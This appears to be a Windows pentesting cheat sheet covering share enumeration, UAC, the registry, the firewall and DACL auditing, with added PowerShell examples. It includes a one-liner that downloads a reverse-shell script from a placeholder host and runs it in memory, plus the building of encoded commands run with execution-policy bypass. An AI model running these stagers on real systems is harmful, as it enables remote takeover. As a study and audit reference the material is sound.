This article is currently being written.
Enumerate SMB shares and the access the current credentials have on them :
$ crackmapexec smb example.com --shares
$ smbclient -L example.com
Display the folders exported by an NFS server, then mount one :
$ showmount -e example.com
$ sudo mount -t nfs example.com:/shared_folder /mnt/folder
Download a file (iwr is the alias of Invoke-WebRequest) :
C:\> iwr http://example.com/
C:\> Invoke-WebRequest 'https://example.com/files/backup.zip' -OutFile C:\backup.zip
Run a PowerShell expression
Fetch a script and execute it in memory, or pass a whole script on the command line. The value given to -EncodedCommand is the Base64 of the UTF-16LE (Unicode) bytes of the script, not of its UTF-8 bytes :
C:\> IEX( IWR http://example.com/revshell.ps1 )
C:\> powershell.exe -EncodedCommand <base64>
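Building and decoding an -EncodedCommand payload, as an added example that is not part of the original page. The script string and the process-creation-log use case are assumptions chosen for the demonstration; the encoding rule (UTF-16LE then Base64) is what powershell.exe implements.

```powershell
# Added example (not from the original page): build and decode payloads for
# powershell.exe -EncodedCommand. The switch expects Base64 of the UTF-16LE
# ("Unicode") bytes of the script; Base64 of UTF-8 bytes decodes to garbage.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}

# Reverse direction: handy when reviewing process-creation logs (Sysmon event 1,
# Security event 4688) that show a suspicious "-EncodedCommand <b64>" or "-enc <b64>".
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

# Harmless demo script (assumed); an operator's payload would be a stager such as
# the IEX(IWR ...) one-liner above.
$script  = 'Write-Output ("user={0} host={1}" -f $env:USERNAME, $env:COMPUTERNAME)'
$encoded = ConvertTo-EncodedCommand -Script $script

# Round-trip check: decoding must give back exactly the original script.
if ((ConvertFrom-EncodedCommand -Encoded $encoded) -ne $script) { throw 'round-trip mismatch' }
"Encoded payload: $encoded"

# -NoProfile skips profile scripts, -ExecutionPolicy Bypass skips the policy check;
# together with -WindowStyle Hidden this is the combination most often seen in
# malicious command lines, so it is also what detection rules key on.
& powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand $encoded
```

Defenders can feed the Base64 from a logged command line straight into ConvertFrom-EncodedCommand; if the result is unreadable, the attacker probably encoded UTF-8 by mistake and the command never ran as intended.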
User Account Control (UAC)
The User Account Control (UAC) aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.
Type of accounts
| Account | Rights |
|---|---|
| Guest | Can run portable software; cannot change system settings. |
| Standard | Can run portable software and change system settings that do not affect other users. |
| Administrator | Complete control over the PC (after UAC elevation). |
| System | Complete control over the PC; the LocalSystem account under which most services run, with more privileges than an interactive Administrator. |
| Domain Administrator | Complete control over every computer in the domain. |
Display the network configuration (IPv4 address, DNS server, network mask, MAC address, ...) :
C:\> ipconfig /all
Display all the environment variables :
C:\> set
Useful ones :
- APPDATA : Path to the application data directory of the current user.
- TEMP : Path to the temporary directory.
- PUBLIC : Path to the public directory (all users have read and write permission).
- LOGONSERVER : Domain controller that authenticated the current logon.
User & group information
Find information about the current user :
C:\> net user %username%
C:\> net user %username% /domain
Find administration users and groups :
C:\> net localgroup administrators
Microsoft Management Console (MMC)
You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system. MMC runs on all client operating systems that are currently supported.
Launch the MMC panel :
C:\> mmc
Displays all available information about Group Policy :
C:\> gpresult /z
Docs about gpresult.
Registry Editor (regedit)
The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interfaces can all use the registry. The registry also allows access to counters for profiling system performance.
Paths for policies in regedit (user policies first, then machine policies) :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_LOCAL_MACHINE\Software\Policies
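Reading the UAC settings (which live under the HKEY_LOCAL_MACHINE policies path above) and walking the four policy locations, as an added example that serves both the UAC section and this registry section; it is not code from the original page. The value meanings are the ones Microsoft documents for these entries; the defaults assumed for absent values are the out-of-the-box ones.

```powershell
# Added example (not from the original page): what UAC is actually configured to do,
# whether the current token is elevated, and which policies are set in the registry.

$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $uacKey

# ConsentPromptBehaviorAdmin: what an administrator sees when elevation is requested.
$consentMeaning = @{
    0 = 'elevate without prompting (UAC effectively off for admins)'
    1 = 'prompt for credentials on the secure desktop'
    2 = 'prompt for consent on the secure desktop'
    3 = 'prompt for credentials'
    4 = 'prompt for consent'
    5 = 'prompt for consent for non-Windows binaries (default)'
}

# Absent values mean the default applies (assumed defaults: UAC on, level 5, secure desktop on).
$enableLua = if ($null -ne $uac.EnableLUA) { $uac.EnableLUA } else { 1 }
$consent   = if ($null -ne $uac.ConsentPromptBehaviorAdmin) { $uac.ConsentPromptBehaviorAdmin } else { 5 }
$secureDsk = if ($null -ne $uac.PromptOnSecureDesktop) { $uac.PromptOnSecureDesktop } else { 1 }
# LocalAccountTokenFilterPolicy = 1 disables "remote UAC": a local admin then gets a full
# token over SMB/WMI/PSRemoting. Absent or 0 means remote admin tokens are filtered.
$tokenFilter = $uac.LocalAccountTokenFilterPolicy

"EnableLUA                    : $enableLua ($(if ($enableLua -eq 1) { 'UAC enabled' } else { 'UAC disabled' }))"
"ConsentPromptBehaviorAdmin   : $consent ($($consentMeaning[[int]$consent]))"
"PromptOnSecureDesktop        : $secureDsk"
"LocalAccountTokenFilterPolicy: $(if ($null -eq $tokenFilter) { 'not set (filtered)' } else { $tokenFilter })"

# Is this process elevated? Under UAC an administrator normally runs with a filtered
# token, so "net localgroup administrators" listing you does not mean you can write HKLM.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
$elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
"Current token elevated       : $elevated ($($identity.Name))"

# Walk the four policy locations from the list above and print every value that is set.
$policyPaths = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies',
    'HKCU:\Software\Policies',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies',
    'HKLM:\Software\Policies'
)
foreach ($path in $policyPaths) {
    if (-not (Test-Path $path)) { "$path : (absent)"; continue }
    foreach ($key in Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue) {
        foreach ($name in $key.GetValueNames()) {
            '{0}\{1} = {2}' -f $key.Name, $name, ($key.GetValue($name) -join ',')
        }
    }
}
```

Reading HKLM needs no elevation, so this runs from a standard-user shell; the elevation check is the part that tells you whether the tooling you run next will actually be able to change anything.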
Windows Firewall (officially Windows Defender Firewall since Windows 10) is the host firewall component of Microsoft Windows.
Show the state and default actions of all firewall profiles :
C:\> netsh advfirewall show allprofiles
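The same information through the NetSecurity cmdlets, plus the inbound rules that actually admit traffic, as an added example that is not part of the original page. It assumes Windows 8 / Server 2012 or later, where these cmdlets exist.

```powershell
# Added example (not from the original page): profile state and effective inbound
# Allow rules, resolved to their port and program filters.

# A disabled profile, or DefaultInboundAction = Allow, admits connections regardless
# of the individual rules, so check this first.
Get-NetFirewallProfile |
    Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction, LogFileName |
    Format-Table -AutoSize

# Enabled inbound Allow rules. The rule object carries no port or program itself;
# those live in filter objects joined via the Get-NetFirewall*Filter cmdlets.
$rules = Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow -ErrorAction SilentlyContinue
$report = foreach ($rule in $rules) {
    $port = $rule | Get-NetFirewallPortFilter
    $app  = $rule | Get-NetFirewallApplicationFilter
    [pscustomobject]@{
        Name      = $rule.DisplayName
        Profile   = $rule.Profile
        Protocol  = $port.Protocol
        LocalPort = ($port.LocalPort -join ',')
        Program   = $app.Program
    }
}
$report | Sort-Object LocalPort | Format-Table -AutoSize

# Rules that open a fixed port to "Any" program deserve a second look: whatever ends
# up listening on that port is reachable, not just the service the rule was made for.
$report | Where-Object { $_.Program -eq 'Any' -and $_.LocalPort -ne 'Any' } | Format-Table -AutoSize
```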
Change drive and directory :
C:\> e:
E:\> d:
D:\> cd Documents
D:\Documents>
C: Windows system disk.
D: Data storage disk.
E: Data storage disk.
X: Drive letter used by Windows PE (the boot and recovery environment).
A drive letter is only a label assigned when the volume is mounted; the assignment above is the usual convention, not a fixed rule.
dir list the content of a directory.
C:\> dir
mkdir create directory.
C:\> mkdir <directory>
del delete file.
C:\> del <filename>
rmdir delete folder.
C:\> rmdir <folder>
Use the /S argument to remove the folder together with all the files and subfolders it contains (add /Q to skip the confirmation prompt).
C:\> move <src> <dst>
copy only copies files, not the folders within.
C:\> copy <src> <dst>
xcopy also copies the folders within when given /S (non-empty subfolders) or /E (all subfolders, including empty ones); /I makes it treat the destination as a directory.
C:\> xcopy /E /I <src> <dst>
icacls displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.
C:\> icacls <file>
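Auditing DACLs for entries that let any user write, as an added example that is not part of the original page. icacls prints the same ACEs, but Get-Acl returns them as objects that can be filtered over many paths. The Find-WeakDacl function, the list of broad principals and the choice of targets (PATH directories and service binary folders) are assumptions made for the demonstration.

```powershell
# Added example (not from the original page): flag files and directories whose DACL
# grants write rights to broad principals. A writable directory on PATH, or a writable
# service binary folder, is a classic way to get code run by a more privileged process.

function Find-WeakDacl {
    param([Parameter(Mandatory)][string[]]$Paths)

    # Principals whose write access effectively means "any logged-on user" (assumed list).
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

    # Rights that allow changing content, replacing children, or rewriting the ACL itself.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                 [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                 [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                 [System.Security.AccessControl.FileSystemRights]::WriteDacl -bor
                 [System.Security.AccessControl.FileSystemRights]::WriteOwner

    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
        if ($null -eq $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($broad -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Targets (assumed): every directory on PATH, plus the folder of every service binary.
# Service PathName looks like '"C:\Program Files\x\y.exe" /arg' or 'C:\Windows\svc.exe -k',
# so capture the part up to the first ".exe" before taking the parent directory.
$pathDirs = $env:Path -split ';' | Where-Object { $_ }
$svcDirs  = Get-CimInstance Win32_Service |
    ForEach-Object { if ($_.PathName -match '^"?(.+?\.exe)') { Split-Path -Parent $matches[1] } } |
    Where-Object { $_ } | Sort-Object -Unique

Find-WeakDacl -Paths ($pathDirs + $svcDirs) | Format-Table -AutoSize
```

Deny ACEs are skipped on purpose: the function reports Allow entries only, so a path that also carries a Deny for the same principal can show up even though access is ultimately refused. Confirm any hit with icacls on that path before acting on it.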